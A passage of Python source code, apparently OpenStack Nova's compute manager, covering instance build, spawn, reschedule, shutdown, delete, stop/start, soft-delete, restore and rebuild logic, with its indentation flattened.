driver_block_device.legacy_block_devices(
block_device_info[bdm_type])
# Get swap out of the list
block_device_info['swap'] = driver_block_device.get_swap(
block_device_info['swap'])
return block_device_info
except exception.OverQuota:
msg = _LW('Failed to create block device for instance due to '
'being over volume resource quota')
LOG.warn(msg, instance=instance)
raise exception.InvalidBDM()
except Exception:
LOG.exception(_LE('Instance failed block device setup'),
instance=instance)
raise exception.InvalidBDM()
def _update_instance_after_spawn(self, context, instance):
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.launched_at = timeutils.utcnow()
configdrive.update_instance(instance)
@object_compat
def _spawn(self, context, instance, image_meta, network_info,
block_device_info, injected_files, admin_password,
set_access_ip=False):
"""Spawn an instance with error logging and update its power state."""
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
instance.save(expected_task_state=task_states.BLOCK_DEVICE_MAPPING)
try:
self.driver.spawn(context, instance, image_meta,
injected_files, admin_password,
network_info,
block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
self._update_instance_after_spawn(context, instance)
def _set_access_ip_values():
"""Add access ip values for a given instance.
If CONF.default_access_ip_network_name is set, this method will
grab the corresponding network and set the access ip values
accordingly. Note that when there are multiple ips to choose
from, an arbitrary one will be chosen.
"""
network_name = CONF.default_access_ip_network_name
if not network_name:
return
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if ip['version'] == 6:
instance.access_ip_v6 = ip['address']
return
if set_access_ip:
_set_access_ip_values()
network_info.wait(do_raise=True)
instance.info_cache.network_info = network_info
# NOTE(JoshNang) This also saves the changes to the instance from
# _allocate_network_async, as they aren't saved in that function
# to prevent races.
instance.save(expected_task_state=task_states.SPAWNING)
return instance
def _update_scheduler_instance_info(self, context, instance):
"""Sends an InstanceList with created or updated Instance objects to
the Scheduler client.
In the case of init_host, the value passed will already be an
InstanceList. Other calls will send individual Instance objects that
have been created or resized. In this case, we create an InstanceList
object containing that Instance.
"""
if not self.send_instance_updates:
return
if isinstance(instance, objects.Instance):
instance = objects.InstanceList(objects=[instance])
context = context.elevated()
self.scheduler_client.update_instance_info(context, self.host,
instance)
def _delete_scheduler_instance_info(self, context, instance_uuid):
"""Sends the uuid of the deleted Instance to the Scheduler client."""
if not self.send_instance_updates:
return
context = context.elevated()
self.scheduler_client.delete_instance_info(context, self.host,
instance_uuid)
@periodic_task.periodic_task(spacing=CONF.scheduler_instance_sync_interval)
def _sync_scheduler_instance_info(self, context):
if not self.send_instance_updates:
return
context = context.elevated()
instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
uuids = [instance.uuid for instance in instances]
self.scheduler_client.sync_instance_info(context, self.host, uuids)
def _notify_about_instance_usage(self, context, instance, event_suffix,
network_info=None, system_metadata=None,
extra_usage_info=None, fault=None):
compute_utils.notify_about_instance_usage(
self.notifier, context, instance, event_suffix,
network_info=network_info,
system_metadata=system_metadata,
extra_usage_info=extra_usage_info, fault=fault)
def _deallocate_network(self, context, instance,
requested_networks=None):
LOG.debug('Deallocating network for instance', instance=instance)
self.network_api.deallocate_for_instance(
context, instance, requested_networks=requested_networks)
def _get_instance_block_device_info(self, context, instance,
refresh_conn_info=False,
bdms=None):
"""Transform block devices to the driver block_device format."""
if not bdms:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
swap = driver_block_device.convert_swap(bdms)
ephemerals = driver_block_device.convert_ephemerals(bdms)
block_device_mapping = (
driver_block_device.convert_volumes(bdms) +
driver_block_device.convert_snapshots(bdms) +
driver_block_device.convert_images(bdms))
if not refresh_conn_info:
# if the block_device_mapping has no value in connection_info
# (returned as None), don't include in the mapping
block_device_mapping = [
bdm for bdm in block_device_mapping
if bdm.get('connection_info')]
else:
block_device_mapping = driver_block_device.refresh_conn_infos(
block_device_mapping, context, instance, self.volume_api,
self.driver)
if self.use_legacy_block_device_info:
swap = driver_block_device.legacy_block_devices(swap)
ephemerals = driver_block_device.legacy_block_devices(ephemerals)
block_device_mapping = driver_block_device.legacy_block_devices(
block_device_mapping)
# Get swap out of the list
swap = driver_block_device.get_swap(swap)
root_device_name = instance.get('root_device_name')
return {'swap': swap,
'root_device_name': root_device_name,
'ephemerals': ephemerals,
'block_device_mapping': block_device_mapping}
# NOTE(mikal): No object_compat wrapper on this method because its
# callers all pass objects already
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def build_and_run_instance(self, context, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
# NOTE(danms): Remove this in v4.0 of the RPC API
if (requested_networks and
not isinstance(requested_networks,
objects.NetworkRequestList)):
requested_networks = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
# NOTE(melwitt): Remove this in v4.0 of the RPC API
flavor = filter_properties.get('instance_type')
if flavor and not isinstance(flavor, objects.Flavor):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
flavor = objects.Flavor.get_by_id(context, flavor['id'])
filter_properties = dict(filter_properties, instance_type=flavor)
# NOTE(sahid): Remove this in v4.0 of the RPC API
if (limits and 'numa_topology' in limits and
isinstance(limits['numa_topology'], six.string_types)):
db_obj = jsonutils.loads(limits['numa_topology'])
limits['numa_topology'] = (
objects.NUMATopologyLimits.obj_from_db_obj(db_obj))
@utils.synchronized(instance.uuid)
def _locked_do_build_and_run_instance(*args, **kwargs):
# NOTE(danms): We grab the semaphore with the instance uuid
# locked because we could wait in line to build this instance
# for a while and we want to make sure that nothing else tries
# to do anything with this instance while we wait.
with self._build_semaphore:
self._do_build_and_run_instance(*args, **kwargs)
# NOTE(danms): We spawn here to return the RPC worker thread back to
# the pool. Since what follows could take a really long time, we don't
# want to tie up RPC workers.
utils.spawn_n(_locked_do_build_and_run_instance,
context, instance, image, request_spec,
filter_properties, admin_password, injected_files,
requested_networks, security_groups,
block_device_mapping, node, limits)
@hooks.add_hook('build_instance')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def _do_build_and_run_instance(self, context, instance, image,
request_spec, filter_properties, admin_password, injected_files,
requested_networks, security_groups, block_device_mapping,
node=None, limits=None):
try:
LOG.info(_LI('Starting instance...'), context=context,
instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = None
instance.save(expected_task_state=
(task_states.SCHEDULING, None))
except exception.InstanceNotFound:
msg = 'Instance disappeared before build.'
LOG.debug(msg, instance=instance)
return build_results.FAILED
except exception.UnexpectedTaskStateError as e:
LOG.debug(e.format_message(), instance=instance)
return build_results.FAILED
# b64 decode the files to inject:
decoded_files = self._decode_files(injected_files)
if limits is None:
limits = {}
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug('No node specified, defaulting to %s', node,
instance=instance)
try:
self._build_and_run_instance(context, instance, image,
decoded_files, admin_password, requested_networks,
security_groups, block_device_mapping, node, limits,
filter_properties)
return build_results.ACTIVE
except exception.RescheduledException as e:
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
compute_utils.add_instance_fault_from_exc(context,
instance, e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
LOG.debug(e.format_message(), instance=instance)
retry['exc'] = traceback.format_exception(*sys.exc_info())
# NOTE(comstud): Deallocate networks if the driver wants
# us to do so.
if self.driver.deallocate_networks_on_reschedule(instance):
self._cleanup_allocated_networks(context, instance,
requested_networks)
else:
# NOTE(alex_xu): Network already allocated and we don't
# want to deallocate them before rescheduling. But we need
# cleanup those network resource setup on this host before
# rescheduling.
self.network_api.cleanup_instance_network_on_host(
context, instance, self.host)
instance.task_state = task_states.SCHEDULING
instance.save()
self.compute_task_api.build_instances(context, [instance],
image, filter_properties, admin_password,
injected_files, requested_networks, security_groups,
block_device_mapping)
return build_results.RESCHEDULED
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = 'Instance disappeared during build.'
LOG.debug(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
return build_results.FAILED
except exception.BuildAbortException as e:
LOG.exception(e.format_message(), instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
except Exception as e:
# Should not reach here.
msg = _LE('Unexpected build failure, not rescheduling build.')
LOG.exception(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance.uuid,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._set_instance_error_state(context, instance)
return build_results.FAILED
def _build_and_run_instance(self, context, instance, image, injected_files,
admin_password, requested_networks, security_groups,
block_device_mapping, node, limits, filter_properties):
image_name = image.get('name')
self._notify_about_instance_usage(context, instance, 'create.start',
extra_usage_info={'image_name': image_name})
try:
rt = self._get_resource_tracker(node)
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
with self._build_resources(context, instance,
requested_networks, security_groups, image,
block_device_mapping) as resources:
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
# NOTE(JoshNang) This also saves the changes to the
# instance from _allocate_network_async, as they aren't
# saved in that function to prevent races.
instance.save(expected_task_state=
task_states.BLOCK_DEVICE_MAPPING)
block_device_info = resources['block_device_info']
network_info = resources['network_info']
self.driver.spawn(context, instance, image,
injected_files, admin_password,
network_info=network_info,
block_device_info=block_device_info)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
except exception.ComputeResourcesUnavailable as e:
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=e.format_message())
except exception.BuildAbortException as e:
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
except (exception.FixedIpLimitExceeded,
exception.NoMoreNetworks, exception.NoMoreFixedIps) as e:
LOG.warning(_LW('No more network or fixed IP to be allocated'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s) with error %s, '
'not rescheduling.') % e.format_message()
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.VirtualInterfaceCreateException,
exception.VirtualInterfaceMacAddressException) as e:
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.ImageNotActive,
exception.ImageUnacceptable) as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=six.text_type(e))
# NOTE(alaski): This is only useful during reschedules, remove it now.
instance.system_metadata.pop('network_allocated', None)
self._update_instance_after_spawn(context, instance)
try:
instance.save(expected_task_state=task_states.SPAWNING)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.end', fault=e)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'create.end',
extra_usage_info={'message': _('Success')},
network_info=network_info)
@contextlib.contextmanager
def _build_resources(self, context, instance, requested_networks,
security_groups, image, block_device_mapping):
resources = {}
network_info = None
try:
network_info = self._build_networks_for_instance(context, instance,
requested_networks, security_groups)
resources['network_info'] = network_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
raise
except exception.UnexpectedTaskStateError as e:
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
# Because this allocation is async any failures are likely to occur
# when the driver accesses network_info during spawn().
LOG.exception(_LE('Failed to allocate network(s)'),
instance=instance)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image,
block_device_mapping)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(context, instance,
block_device_mapping)
resources['block_device_info'] = block_device_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
with excutils.save_and_reraise_exception() as ctxt:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.UnexpectedTaskStateError as e:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
LOG.exception(_LE('Failure prepping block device'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
msg = _('Failure prepping block device.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
yield resources
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if not isinstance(exc, (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError)):
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
# if network_info is empty we're likely here because of
# network allocation failure. Since nothing can be reused on
# rescheduling it's better to deallocate network to eliminate
# the chance of orphaned ports in neutron
deallocate_networks = False if network_info else True
try:
self._shutdown_instance(context, instance,
block_device_mapping, requested_networks,
try_deallocate_networks=deallocate_networks)
except Exception:
ctxt.reraise = False
msg = _('Could not clean up failed build,'
' not rescheduling')
raise exception.BuildAbortException(
instance_uuid=instance.uuid, reason=msg)
def _cleanup_allocated_networks(self, context, instance,
requested_networks):
try:
self._deallocate_network(context, instance, requested_networks)
except Exception:
msg = _LE('Failed to deallocate networks')
LOG.exception(msg, instance=instance)
return
instance.system_metadata['network_allocated'] = 'False'
try:
instance.save()
except exception.InstanceNotFound:
# NOTE(alaski): It's possible that we're cleaning up the networks
# because the instance was deleted. If that's the case then this
# exception will be raised by instance.save()
pass
@object_compat
@messaging.expected_exceptions(exception.BuildAbortException,
exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException,
exception.RescheduledException)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def run_instance(self, context, instance, request_spec,
filter_properties, requested_networks,
injected_files, admin_password,
is_first_time, node, legacy_bdm_in_spec):
# NOTE(alaski) This method should be deprecated when the scheduler and
# compute rpc interfaces are bumped to 4.x, and slated for removal in
# 5.x as it is no longer used.
if filter_properties is None:
filter_properties = {}
@utils.synchronized(instance.uuid)
def do_run_instance():
self._run_instance(context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec)
do_run_instance()
def _try_deallocate_network(self, context, instance,
requested_networks=None):
try:
# tear down allocated network structure
self._deallocate_network(context, instance, requested_networks)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to deallocate network for instance.'),
instance=instance)
self._set_instance_error_state(context, instance)
def _get_power_off_values(self, context, instance, clean_shutdown):
"""Get the timing configuration for powering down this instance."""
if clean_shutdown:
timeout = compute_utils.get_value_from_system_metadata(instance,
key='image_os_shutdown_timeout', type=int,
default=CONF.shutdown_timeout)
retry_interval = self.SHUTDOWN_RETRY_INTERVAL
else:
timeout = 0
retry_interval = 0
return timeout, retry_interval
def _power_off_instance(self, context, instance, clean_shutdown=True):
"""Power off an instance on this host."""
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
self.driver.power_off(instance, timeout, retry_interval)
def _shutdown_instance(self, context, instance,
bdms, requested_networks=None, notify=True,
try_deallocate_networks=True):
"""Shutdown an instance on this host.
:param:context: security context
:param:instance: a nova.objects.Instance object
:param:bdms: the block devices for the instance to be torn
down
:param:requested_networks: the networks on which the instance
has ports
:param:notify: true if a final usage notification should be
emitted
:param:try_deallocate_networks: false if we should avoid
trying to teardown networking
"""
context = context.elevated()
LOG.info(_LI('%(action_str)s instance') %
{'action_str': 'Terminating'},
context=context, instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.start")
network_info = compute_utils.get_nw_info_for_instance(instance)
# NOTE(vish) get bdms before destroying the instance
vol_bdms = [bdm for bdm in bdms if bdm.is_volume]
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
# NOTE(melwitt): attempt driver destroy before releasing ip, may
# want to keep ip allocated for certain failures
try:
self.driver.destroy(context, instance, network_info,
block_device_info)
except exception.InstancePowerOffFailure:
# if the instance can't power off, don't release the ip
with excutils.save_and_reraise_exception():
pass
except Exception:
with excutils.save_and_reraise_exception():
# deallocate ip and fail without proceeding to
# volume api calls, preserving current behavior
if try_deallocate_networks:
self._try_deallocate_network(context, instance,
requested_networks)
if try_deallocate_networks:
self._try_deallocate_network(context, instance, requested_networks)
for bdm in vol_bdms:
try:
# NOTE(vish): actual driver detach done in driver.destroy, so
# just tell cinder that we are done with it.
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(context, bdm.volume_id)
except exception.DiskNotFound as exc:
LOG.debug('Ignoring DiskNotFound: %s', exc,
instance=instance)
except exception.VolumeNotFound as exc:
LOG.debug('Ignoring VolumeNotFound: %s', exc,
instance=instance)
except (cinder_exception.EndpointNotFound,
keystone_exception.EndpointNotFound) as exc:
LOG.warning(_LW('Ignoring EndpointNotFound: %s'), exc,
instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.end")
def _cleanup_volumes(self, context, instance_uuid, bdms, raise_exc=True):
exc_info = None
for bdm in bdms:
LOG.debug("terminating bdm %s", bdm,
instance_uuid=instance_uuid)
if bdm.volume_id and bdm.delete_on_termination:
try:
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning(_LW('Failed to delete volume: %(volume_id)s '
'due to %(exc)s'),
{'volume_id': bdm.volume_id, 'exc': exc})
if exc_info is not None and raise_exc:
six.reraise(exc_info[0], exc_info[1], exc_info[2])
@hooks.add_hook("delete_instance")
def _delete_instance(self, context, instance, bdms, quotas):
"""Delete an instance on this host. Commit or rollback quotas
as necessary.
:param context: nova request context
:param instance: nova.objects.instance.Instance object
:param bdms: nova.objects.block_device.BlockDeviceMappingList object
:param quotas: nova.objects.quotas.Quotas object
"""
was_soft_deleted = instance.vm_state == vm_states.SOFT_DELETED
if was_soft_deleted:
# Instances in SOFT_DELETED vm_state have already had quotas
# decremented.
try:
quotas.rollback()
except Exception:
pass
try:
events = self.instance_events.clear_events_for_instance(instance)
if events:
LOG.debug('Events pending at deletion: %(events)s',
{'events': ','.join(events.keys())},
instance=instance)
self._notify_about_instance_usage(context, instance,
"delete.start")
self._shutdown_instance(context, instance, bdms)
# NOTE(dims): instance.info_cache.delete() should be called after
# _shutdown_instance in the compute manager as shutdown calls
# deallocate_for_instance so the info_cache is still needed
# at this point.
instance.info_cache.delete()
# NOTE(vish): We have already deleted the instance, so we have
# to ignore problems cleaning up the volumes. It
# would be nice to let the user know somehow that
# the volume deletion failed, but it is not
# acceptable to have an instance that can not be
# deleted. Perhaps this could be reworked in the
# future to set an instance fault the first time
# and to only ignore the failure if the instance
# is already in ERROR.
self._cleanup_volumes(context, instance.uuid, bdms,
raise_exc=False)
# if a delete task succeeded, always update vm state and task
# state without expecting task state to be DELETING
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.power_state = power_state.NOSTATE
instance.terminated_at = timeutils.utcnow()
instance.save()
self._update_resource_tracker(context, instance)
system_meta = instance.system_metadata
instance.destroy()
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def terminate_instance(self, context, instance, bdms, reservations):
"""Terminate an instance on this host."""
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this when we bump the RPC major version to 4.0
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
@utils.synchronized(instance.uuid)
def do_terminate_instance(instance, bdms):
try:
self._delete_instance(context, instance, bdms, quotas)
except exception.InstanceNotFound:
LOG.info(_LI("Instance disappeared during terminate"),
instance=instance)
except Exception:
# As we're trying to delete always go to Error if something
# goes wrong that _delete_instance can't handle.
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
self._set_instance_error_state(context, instance)
do_terminate_instance(instance, bdms)
# NOTE(johannes): This is probably better named power_off_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def stop_instance(self, context, instance, clean_shutdown=True):
"""Stopping an instance on this host."""
@utils.synchronized(instance.uuid)
def do_stop_instance():
current_power_state = self._get_power_state(context, instance)
LOG.debug('Stopping instance; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, current VM '
'power_state: %(current_power_state)s',
dict(vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
current_power_state=current_power_state),
instance_uuid=instance.uuid)
# NOTE(mriedem): If the instance is already powered off, we are
# possibly tearing down and racing with other operations, so we can
# expect the task_state to be None if something else updates the
# instance and we're not locking it.
expected_task_state = [task_states.POWERING_OFF]
# The list of power states is from _sync_instance_power_state.
if current_power_state in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.info(_LI('Instance is already powered off in the '
'hypervisor when stop is called.'),
instance=instance)
expected_task_state.append(None)
self._notify_about_instance_usage(context, instance,
"power_off.start")
self._power_off_instance(context, instance, clean_shutdown)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.STOPPED
instance.task_state = None
instance.save(expected_task_state=expected_task_state)
self._notify_about_instance_usage(context, instance,
"power_off.end")
do_stop_instance()
def _power_on(self, context, instance):
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.power_on(context, instance,
network_info,
block_device_info)
def _delete_snapshot_of_shelved_instance(self, context, instance,
snapshot_id):
"""Delete snapshot of shelved instance."""
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning(_LW("Failed to delete snapshot "
"from shelved instance (%s)."),
exc.format_message(), instance=instance)
except Exception:
LOG.exception(_LE("Something wrong happened when trying to "
"delete snapshot from shelved instance."),
instance=instance)
# NOTE(johannes): This is probably better named power_on_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def start_instance(self, context, instance):
"""Starting an instance on this host."""
self._notify_about_instance_usage(context, instance, "power_on.start")
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
# Delete an image(VM snapshot) for a shelved instance
snapshot_id = instance.system_metadata.get('shelved_image_id')
if snapshot_id:
self._delete_snapshot_of_shelved_instance(context, instance,
snapshot_id)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.POWERING_ON)
self._notify_about_instance_usage(context, instance, "power_on.end")
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def soft_delete_instance(self, context, instance, reservations):
"""Soft delete an instance on this host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._notify_about_instance_usage(context, instance,
"soft_delete.start")
try:
self.driver.soft_delete(instance)
except NotImplementedError:
# Fallback to just powering off the instance if the
# hypervisor doesn't implement the soft_delete method
self.driver.power_off(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save(expected_task_state=[task_states.SOFT_DELETING])
except Exception:
with excutils.save_and_reraise_exception():
quotas.rollback()
quotas.commit()
self._notify_about_instance_usage(context, instance, "soft_delete.end")
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def restore_instance(self, context, instance):
"""Restore a soft-deleted instance on this host."""
self._notify_about_instance_usage(context, instance, "restore.start")
try:
self.driver.restore(instance)
except NotImplementedError:
# Fallback to just powering on the instance if the hypervisor
# doesn't implement the restore method
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.RESTORING)
self._notify_about_instance_usage(context, instance, "restore.end")
def _rebuild_default_impl(self, context, instance, image_meta,
injected_files, admin_password, bdms,
detach_block_devices, attach_block_devices,
network_info=None,
recreate=False, block_device_info=None,
preserve_ephemeral=False):
if preserve_ephemeral:
# The default code path does not support preserving ephemeral
# partitions.
raise exception.PreserveEphemeralNotSupported()
detach_block_devices(context, bdms)
if not recreate:
self.driver.destroy(context, instance, network_info,
block_device_info=block_device_info)
instance.task_state = task_states.REBUILD_BLOCK_DEVICE_MAPPING
instance.save(expected_task_state=[task_states.REBUILDING])
new_block_device_info = attach_block_devices(context, instance, bdms)
instance.task_state = task_states.REBUILD_SPAWNING
instance.save(
expected_task_state=[task_states.REBUILD_BLOCK_DEVICE_MAPPING])
self.driver.spawn(context, instance, image_meta, injected_files,
admin_password, network_info=network_info,
block_device_info=new_block_device_info)
@object_compat
@messaging.expected_exceptions(exception.PreserveEphemeralNotSupported)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
"""Destroy and re-make this instance.
A 'rebuild' effectively purges all existing data from the system and
remakes the VM with given 'metadata' and 'personalities'.
:param context: `nova.RequestContext` object
:param instance: Instance object
:param orig_image_ref: Original image_ref before rebuild
:param image_ref: New image_ref for rebuild
:param injected_files: Files to inject
:param new_pass: password to set on rebuilt instance
:param orig_sys_metadata: instance system metadata from pre-rebuild
:param bdms: block-device-mappings to use for rebuild
:param recreate: True if the instance is being recreated (e.g. the
hypervisor it was on failed) - cleanup of old state will be
skipped.
:param on_shared_storage: True if instance files on shared storage
:param preserve_ephemeral: True if the default ephemeral storage
partition must be preserved on rebuild
"""
context = context.elevated()
# NOTE (ndipanov): If we get non-object BDMs, just get them from the
# db again, as this means they are sent in the old format and we want
# to avoid converting them back when we can just get them.
# Remove this on the next major RPC version bump
if (bdms and
any(not isinstance(bdm, obj_base.NovaObject)
for bdm in bdms)):
bdms = None
orig_vm_state = instance.vm_state
with self._error_out_instance_on_exception(context, instance):
LOG.info(_LI("Rebuilding instance"), context=context,
instance=instance)
if recreate:
if not self.driver.capabilities["supports_recreate"]:
raise exception.InstanceRecreateNotSupported
self._check_instance_exists(context, instance)
# To cover case when admin expects that instance files are on
# shared storage, but not accessible and vice versa
if on_shared_storage != self.driver.instance_on_disk(instance):
raise exception.InvalidSharedStorage(
_("Invalid state of instance files on shared"
" storage"))
if on_shared_storage:
LOG.info(_LI('disk on shared storage, recreating using'
' existing disk'))
else:
image_ref = orig_image_ref = instance.image_ref
LOG.info(_LI("disk not on shared storage, rebuilding from:"
" '%s'"), str(image_ref))
# NOTE(mriedem): On a recreate (evacuate), we need to update
# the instance's host and node properties to reflect it's
# destination node for the recreate.
node_name = None
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'),
self.host)
finally:
instance.host = self.host
instance.node = node_name
instance.save()
if image_ref:
image_meta = self.image_api.get(context, image_ref)
else:
image_meta = {}
# This instance.exists message should contain the original
# image_ref, not the new one. Since the DB has been updated
# to point to the new one... we have to override it.
# TODO(jaypipes): Move generate_image_url() into the nova.image.api
orig_image_ref_url = glance.generate_image_url(orig_image_ref)
extra_usage_info = {'image_ref_url': orig_image_ref_url}
compute_utils.notify_usage_exists(
self.notifier, context, instance,
current_period=True, system_metadata=orig_sys_metadata,
extra_usage_info=extra_usage_info)
# This message should contain the new image_ref
extra_usage_info = {'image_name': image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rebuild.start", extra_usage_info=extra_usage_info)
instance.power_state = self._get_power_state(context, instance)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[task_states.REBUILDING])
if recreate:
# Needed for nova-network, does nothing for neutron
self.network_api.setup_networks_on_host(
context, instance, self.host)
# For nova-network this is needed to move floating IPs
# For neutron this updates the host in the port binding
